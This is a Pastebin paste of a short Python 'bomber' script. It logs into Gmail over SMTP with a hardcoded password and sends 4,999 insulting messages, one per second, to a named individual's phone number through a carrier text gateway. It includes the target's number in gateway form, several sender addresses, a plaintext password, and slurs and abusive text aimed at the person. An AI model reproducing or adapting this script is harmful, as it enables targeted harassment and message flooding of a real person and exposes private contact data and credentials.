Advertisement
Guest User

Gurjeet-BOMBER.py

a guest
Mar 19th, 2017
339
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.46 KB | None | 0 0
  1. ## Exploitix Mod ##
  2. import time
  3. import smtplib
  4.  
  5.  
  6. ##########################
  7. #E-MAILS:                                            #
  8. #billynibber922@gmail.com            #
  9. #gurjeet.hurts.people@gmail.com  #
  10. #d3f4ult.01111000@gmail.com      #
  11. #screw.you.hoe.jeet@gmail.com     #  
  12. ##########################
  13. print(" ")
  14. print("---------------------------------")
  15. print("billynibber922@gmail.com:       1")
  16. print("gurjeet.hurts.people@gmail.com: 2")
  17. print("d3f4ult.01111000@gmail.com:     3")
  18. print("screw.you.hoe.jeet@gmail.com:   4")
  19. print("---------------------------------")
  20. print(" ")
  21.  
  22. print("Let us begin... To FUCK Gurjeet up!!!  ")
  23.  
  24. print(" ")
  25. print(" ")
  26. e = raw_input("Pick G-mail: ")
  27.  
  28. email_provider = 'smtp.gmail.com' #server for your email- see ReadMe on github
  29. email_address = e #your email
  30. email_port = 587 #port for email server- see ReadMe on github
  31. password = 'Familyguy12' #your email password
  32. msg = 'Fuck you, arrogant bitch. There is a reason we all hate you' #your txt message
  33. text_amount = 4999#amount sent
  34. target_email = '8313136185@tmomail.net'#target number. must be in email form- see ReadMe on github
  35. wait = 1 #seconds in between messages
  36.  
  37.  
  38. server = smtplib.SMTP(email_provider, email_port)
  39. server.starttls()
  40. server.login(email_address, password)
  41. for _ in range(0,text_amount):
  42.     server.sendmail(email_address,target_email,msg)
  43.     print("sent")
  44.     time.sleep(wait)
  45. print("{} texts were sent. You fuck'd em good. again shall we? ;)".format(text_amount))
  46. server.quit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement